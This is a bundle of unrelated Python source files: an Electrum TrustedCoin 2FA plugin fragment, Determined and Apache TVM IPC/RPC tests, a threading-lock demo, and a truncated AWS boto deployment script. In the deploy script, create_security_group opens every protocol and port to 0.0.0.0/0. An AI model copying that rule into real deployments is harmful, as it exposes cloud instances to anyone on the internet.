if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.storage.get('x1/')['xpub'] != xpub1 or
wizard.storage.get('x2/')['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
test_ipc.py
|
import abc
import itertools
import multiprocessing
import sys
import textwrap
import time
import traceback
from typing import Any, List, Optional, cast
import pytest
import determined as det
from determined import core, ipc
from tests import parallel
class Subproc(multiprocessing.Process):
"""
Subproc executes an abstract main(), returning the stacktrace as a string in join().
"""
def __init__(self, *arg: Any, **kwarg: Any):
self._error_queue = multiprocessing.Queue() # type: Any
super().__init__(*arg, **kwarg)
def run(self) -> None:
try:
self.main()
except Exception:
self._error_queue.put(traceback.format_exc())
def join_and_check(self, *args: Any, **kwargs: Any) -> Optional[str]:
super().join(*args, **kwargs)
if not self._error_queue.empty():
return cast(str, self._error_queue.get())
return None
@abc.abstractmethod
def main(self) -> None:
pass
class SubprocGroup(list):
"""
SubprocGroup provides a context manager to coordinate opening and closing of many Subprocs.
"""
def join_all(self) -> None:
# Every process should be joinable within one second.
errors = [subproc.join_and_check() for subproc in self]
# Terminate any processes which did not exit in time.
num_unterminated = 0
for subproc in self:
if subproc.is_alive():
subproc.terminate()
subproc.join()
num_unterminated += 1
assert num_unterminated == 0
# Make sure none of the processes raised an error.
errors = [e for e in errors if e is not None]
if len(errors):
print("Traceback from child process:", file=sys.stderr)
print(textwrap.indent(errors[0], "|"), file=sys.stderr)
raise AssertionError("failure in child process")
def __enter__(self) -> "SubprocGroup":
for subproc in self:
subproc.start()
return self
def __exit__(self, *_: Any) -> None:
self.join_all()
class BroadcastClientSubproc(Subproc):
def __init__(
self, rank: int, size: int, pub_url: str, pull_url: str, exp_msgs: List[int]
) -> None:
self._rank = rank
self._size = size
self._pub_url = pub_url
self._pull_url = pull_url
self._exp_msgs = exp_msgs
super().__init__()
def main(self) -> None:
with ipc.ZMQBroadcastClient(self._pub_url, self._pull_url) as broadcast_client:
# Start the server-client communication test.
broadcast_client.send(ipc.ConnectedMessage(process_id=0))
for exp in self._exp_msgs:
msg = broadcast_client.recv()
assert msg == exp
broadcast_client.send(2 * msg)
def test_broadcast_server_client() -> None:
num_subprocs = 3
with ipc.ZMQBroadcastServer(num_connections=num_subprocs) as broadcast_server:
pub_url = f"tcp://localhost:{broadcast_server.get_pub_port()}"
pull_url = f"tcp://localhost:{broadcast_server.get_pull_port()}"
msgs = list(range(10))
with SubprocGroup(
BroadcastClientSubproc(i, num_subprocs, pub_url, pull_url, msgs)
for i in range(num_subprocs)
) as subprocs:
def health_check() -> None:
assert all(subproc.is_alive() for subproc in subprocs)
for subproc in subprocs:
assert subproc.is_alive()
gathered, _ = broadcast_server.gather_with_polling(health_check)
assert all(isinstance(g, ipc.ConnectedMessage) for g in gathered)
for msg in msgs:
broadcast_server.broadcast(msg)
gathered, _ = broadcast_server.gather_with_polling(health_check)
assert all(g == 2 * msg for g in gathered)
def test_zmq_server_client() -> None:
server = ipc.ZMQServer(num_connections=1, ports=None, port_range=(1000, 65535))
assert len(server.get_ports()) == 1
port = server.get_ports()[0]
assert 1000 <= port <= 65535
client = ipc.ZMQClient(ip_address="localhost", port=port)
client_object = {"DeterminedAI": "Great", "det": "Fantastic", 12345: -100}
client.send(client_object)
server_object = server.receive_blocking(send_rank=0)
assert server_object == client_object
server_object["DeterminedAI"] = "VeryGreat"
server.send(server_object)
client_object = client.receive()
assert server_object == client_object
@pytest.mark.parametrize("cross_size", [1, 4])
@pytest.mark.parametrize("local_size", [1, 4])
@pytest.mark.parametrize("force_tcp", [False, True])
def test_distributed_context(cross_size: int, local_size: int, force_tcp: bool) -> None:
size = cross_size * local_size
# Make sure `make test` doesn't hang on macbook's default values. Avoid skipping on linux
# because it's not a common default, and to avoid false positives in CI.
if sys.platform == "darwin" and size == 16:
import resource
if resource.getrlimit(resource.RLIMIT_NOFILE)[0] < 1024:
pytest.skip(
"increase the open fd limit with `ulimit -n 1024` or greater to run this test"
)
with parallel.Execution(size, local_size=local_size, make_distributed_context=False) as pex:
@pex.run
def contexts() -> core.DistributedContext:
return core.DistributedContext(
rank=pex.rank,
size=pex.size,
local_rank=pex.local_rank,
local_size=pex.local_size,
cross_rank=pex.cross_rank,
cross_size=pex.cross_size,
chief_ip="localhost",
force_tcp=force_tcp,
)
# Perform a broadcast.
results = pex.run(lambda: contexts[pex.rank].broadcast(pex.rank)) # type: ignore
assert results == [0] * size, "not all threads ran broadcast correctly"
# Perform a local broadcast.
results = pex.run(lambda: contexts[pex.rank].broadcast_local(pex.rank))
expect = [rank - (rank % local_size) for rank in range(size)] # type: Any
assert results == expect, "not all threads ran broadcast_local correctly"
# Perform a gather.
results = pex.run(lambda: set(contexts[pex.rank].gather(pex.rank) or []))
chief = set(range(size))
expect = [set(range(size)) if rank == 0 else set() for rank in range(size)]
assert results == [chief] + [set()] * (size - 1), "not all threads ran gather correctly"
# Perform a local gather.
results = pex.run(lambda: set(contexts[pex.rank].gather_local(pex.rank) or []))
expect = [
set(range(rank, rank + local_size)) if rank % local_size == 0 else set()
for rank in range(size)
]
assert results == expect, "not all threads ran gather correctly"
# Perform an allgather.
results = pex.run(lambda: set(contexts[pex.rank].allgather(pex.rank)))
expect = set(range(size))
assert results == [expect] * size, "not all threads ran allgather correctly"
# Perform a local allgather.
results = pex.run(lambda: set(contexts[pex.rank].allgather_local(pex.rank)))
expect = [
set(range(cross_rank * local_size, (cross_rank + 1) * local_size))
for cross_rank, _ in itertools.product(range(cross_size), range(local_size))
]
assert results == expect, "not all threads ran allgather_local correctly"
# Close all contexts.
for context in contexts:
context.close()
class TestPIDServer:
@staticmethod
def _worker_proc(
addr: int,
keep_alive: bool = False,
sleep_time: float = 10,
repeat: int = 1,
crash: bool = False,
) -> None:
with ipc.PIDClient(addr) as pid_client:
for _ in range(repeat):
if keep_alive:
pid_client.keep_alive()
time.sleep(sleep_time)
if crash:
raise ValueError("Crashing...")
def test_normal_execution(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
procs = [
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
),
]
for p in procs:
p.start()
pid_server.run()
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 2
def test_worker_crashes(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
# Enforce that the crashed worker causes the exit before the other worker exits.
deadline = time.time() + 20
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
),
]
for p in procs:
p.start()
with pytest.raises(det.errors.WorkerError):
pid_server.run()
assert time.time() < deadline, "crashing worker did not trigger exit"
for p in procs:
p.terminate()
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_return_code_on_worker_error(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
# Enforce that the crashed worker causes the exit before the other worker exits.
deadline = time.time() + 20
# Enforce that run_subprocess exits nonzero on a worker failure, even if the main
# subprocess exits zero.
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
),
]
for p in procs:
p.start()
error_code = pid_server.run_subprocess(["sleep", "2"])
assert error_code == 79
assert time.time() < deadline, "crashing worker did not trigger exit"
for p in procs:
p.terminate()
p.join()
def test_health_check_pre_connect(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
fail_time = time.time() + 0.2
def health_check() -> None:
assert time.time() < fail_time
# Only one worker to guarantee a failed healthcheck before all workers have connected.
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
]
for p in procs:
p.start()
with pytest.raises(AssertionError):
pid_server.run(health_check, poll_period=0.05)
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_health_check_post_connect(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
fail_time = time.time() + 0.2
def health_check() -> None:
assert time.time() < fail_time
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
]
for p in procs:
p.start()
with pytest.raises(AssertionError):
pid_server.run(health_check, poll_period=0.05)
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_single_worker_failure_is_caught(self) -> None:
# This is a regression test; there used to be a codepath where we would stop checking pid's
# after the last pidclient disconnected, even if it disconnected with a failure.
with ipc.PIDServer(addr=0, num_clients=1) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
p = multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
)
p.start()
with pytest.raises(det.errors.WorkerError):
pid_server.run()
p.terminate()
p.join()
|
d2.py
|
from threading import Lock
a = 0
lock = Lock()
def add():
global a
# global lock
for i in range(1000000):
lock.acquire()
a += 1
lock.release()
def desc():
global a
# global lock
for i in range(1000000):
lock.acquire()
a -= 1
lock.release()
if __name__ == '__main__':
"""
锁会影响性能
锁可能会引起死锁。资源竞争
"""
from threading import Thread
t1 = Thread(target=add, name='add')
t2 = Thread(target=desc, name='desc')
t1.start()
t2.start()
t1.join()
t2.join()
print(a)
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import os
import stat
import logging
import time
import multiprocessing
import pytest
import numpy as np
from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
ctx = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), ctx=ctx)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), ctx=ctx)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.asnumpy() + 1, b.asnumpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.register_func("rpc.test.addone")
def addone(x):
return x + 1
@tvm.register_func("rpc.test.strcat")
def strcat(name, x):
return "%s:%d" % (name, x)
@tvm.register_func("rpc.test.except")
def remotethrow(name):
raise ValueError("%s" % name)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm.error.RPCError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.register_func("rpc.test.runtime_str_concat")
def strcat(x, y):
return x + y
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.register_func("rpc.test.remote_array_func")
def remote_array_func(y):
x = np.ones((3, 4))
np.testing.assert_equal(y.asnumpy(), x)
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server("localhost")
remote = rpc.connect(server.host, server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.context).startswith("remote")
np.testing.assert_equal(r_cpu.asnumpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server("localhost")
remote = rpc.connect(server.host, server.port)
ctx = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(b_np, ctx)
np.testing.assert_equal(a.asnumpy(), a_np)
np.testing.assert_equal(b.asnumpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server("localhost")
client = rpc.connect(server.host, server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server("localhost")
client = rpc.connect(
server.host,
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server("localhost")
remote = rpc.connect(server.host, server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server("localhost", key="x0")
server1 = rpc.Server("localhost", key="x1")
client = rpc.connect(
server0.host,
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", server1.host, server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
ctx = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
# statrt the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
ctx = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
ctx = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl", target_host="llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.register_func("rpc.test.remote_func")
def addone(x):
return lambda y: x + y
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
f1 = client.get_function("rpc.test.remote_func")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server("localhost", key="x0")
server1 = rpc.Server("localhost", key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
server0.host,
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", server1.host, server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], ctx=client.cpu(0))
assert nd.asnumpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
server0.host,
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.register_func("rpc.test.remote_return_nd")
def my_module(name):
# Use closure to check the ref counter correctness
nd = tvm.nd.array(np.zeros(10).astype("float32"))
if name == "get_arr":
return lambda: nd
elif name == "ref_count":
return lambda: tvm.testing.object_use_count(nd)
elif name == "get_elem":
return lambda idx: nd.asnumpy()[idx]
elif name == "get_arr_elem":
return lambda arr, idx: arr.asnumpy()[idx]
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.register_func("rpc.test.remote_func2")
def addone(x):
return lambda y: x + y
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.remote_func2")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker("localhost", port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
"localhost",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=(tracker.host, tracker.port),
)
time.sleep(1)
client = rpc.connect_tracker(tracker.host, tracker.port)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
server.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker("localhost", port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
"localhost",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=(tracker.host, tracker.port),
)
client = rpc.connect_tracker(tracker.host, tracker.port)
proc1 = multiprocessing.Process(
target=_target, args=(tracker.host, tracker.port, device_key, 4)
)
proc2 = multiprocessing.Process(
target=_target, args=(tracker.host, tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
test_rpc_echo()
test_rpc_session_constructor_args()
test_rpc_return_ndarray()
test_rpc_return_func()
test_bigendian_rpc()
test_rpc_remote_module()
test_rpc_file_exchange()
test_rpc_array()
test_rpc_simple()
test_local_func()
test_rpc_tracker_register()
test_rpc_tracker_request()
test_rpc_large_array()
|
deploy.py
|
#!/usr/bin/python
import threading
from boto.ec2.autoscale import AutoScaleConnection, Tag
from boto.exception import EC2ResponseError, BotoServerError
import time
import os
from boto.ec2.connection import EC2Connection
from boto.ec2.elb import HealthCheck, ELBConnection
from boto.ec2.autoscale import LaunchConfiguration
from boto.ec2.autoscale import AutoScalingGroup
from boto.ec2.autoscale import ScalingPolicy
from boto.ec2.cloudwatch import MetricAlarm
from boto.ec2.cloudwatch import CloudWatchConnection
from sys import argv
def read_properties(filename):
properties = []
for line in open(filename):
properties.append(line.replace('\n', ''))
return tuple(properties)
class MSBManager:
def __init__(self, aws_access_key, aws_secret_key):
self.ec2_conn = EC2Connection(aws_access_key, aws_secret_key)
self.elb_conn = ELBConnection(aws_access_key, aws_secret_key)
self.auto_scale_conn = AutoScaleConnection(aws_access_key, aws_secret_key)
self.cloud_watch_conn = CloudWatchConnection(aws_access_key, aws_secret_key)
self.default_cooldown = 60
def get_security_group(self, name):
sgs = [g for g in self.ec2_conn.get_all_security_groups() if g.name == name]
return sgs[0] if sgs else None
def create_security_group(self, name, description):
sgs = [g for g in self.ec2_conn.get_all_security_groups() if g.name == name]
sg = sgs[0] if sgs else None
if not sgs:
sg = self.ec2_conn.create_security_group(name, description)
try:
sg.authorize(ip_protocol="-1", from_port=None, to_port=None, cidr_ip="0.0.0.0/0", dry_run=False)
except EC2ResponseError:
pass
return sg
def remove_security_group(self, name):
self.ec2_conn.delete_security_group(name=name)
def create_instance(self, image, instance_type, key_name, zone, security_groups, tags):
instance = None
reservations = self.ec2_conn.get_all_instances()
for reservation in reservations:
for i in reservation.instances:
if 'Name' in i.tags and i.tags['Name'] == tags['Name'] and i.state == 'running':
instance = i
break
if not instance:
reservation = self.ec2_conn.run_instances(image, instance_type=instance_type, key_name=key_name, placement=zone, security_groups=security_groups, monitoring_enabled=True)
instance = reservation.instances[0]
while not instance.update() == 'running':
time.sleep(5)
time.sleep(10)
self.ec2_conn.create_tags([instance.id], tags)
return instance
def request_spot_instance(self, bid, image, instance_type, key_name, zone, security_groups, tags):
req = self.ec2_conn.request_spot_instances(price=bid, instance_type=instance_type, image_id=image, placement=zone,key_name=key_name, security_groups=security_groups)
instance_id = None
while not instance_id:
job_sir_id = req[0].id
requests = self.ec2_conn.get_all_spot_instance_requests()
for sir in requests:
if sir.id == job_sir_id:
instance_id = sir.instance_id
break
print 'Job {} not ready'.format(job_sir_id)
time.sleep(60)
self.ec2_conn.create_tags([instance_id], tags)
def remove_instance(self, instance_id):
self.remove_instances([instance_id])
def remove_instances(self, instance_ids):
self.ec2_conn.terminate_instances(instance_ids)
def remove_instance_by_tag_name(self, name):
reservations = self.ec2_conn.get_all_instances()
data_centers_intance_ids = []
for reservation in reservations:
for instance in reservation.instances:
if 'Name' in instance.tags and instance.tags['Name'] == name and instance.state == 'running':
data_centers_intance_ids.append(instance.id)
if data_centers_intance_ids:
self.remove_instances(data_centers_intance_ids)
def create_elb(self, name, zone, project_tag_value, security_group_id, instance_ids=None):
lbs = [l for l in self.elb_conn.get_all_load_balancers() if l.name == name]
lb = lbs[0] if lbs else None
if not lb:
hc = HealthCheck(timeout=50, interval=60, healthy_threshold=2, unhealthy_threshold=8, target='HTTP:80/heartbeat')
ports = [(80, 80, 'http')]
zones = [zone]
lb = self.elb_conn.create_load_balancer(name, zones, ports)
self.elb_conn.apply_security_groups_to_lb(name, [security_group_id])
lb.configure_health_check(hc)
if instance_ids:
lb.register_instances(instance_ids)
params = {'LoadBalancerNames.member.1': lb.name,
'Tags.member.1.Key': '15619project',
'Tags.member.1.Value': project_tag_value}
lb.connection.get_status('AddTags', params, verb='POST')
return lb
def remove_elb(self, name):
self.elb_conn.delete_load_balancer(name)
def create_launch_configuration(self, name, image, key_name, security_groups, instance_type):
lcs = [l for l in self.auto_scale_conn.get_all_launch_configurations() if l.name == name]
lc = lcs[0] if lcs else None
if not lc:
lc = LaunchConfiguration(name=name, image_id=image, key_name=key_name,
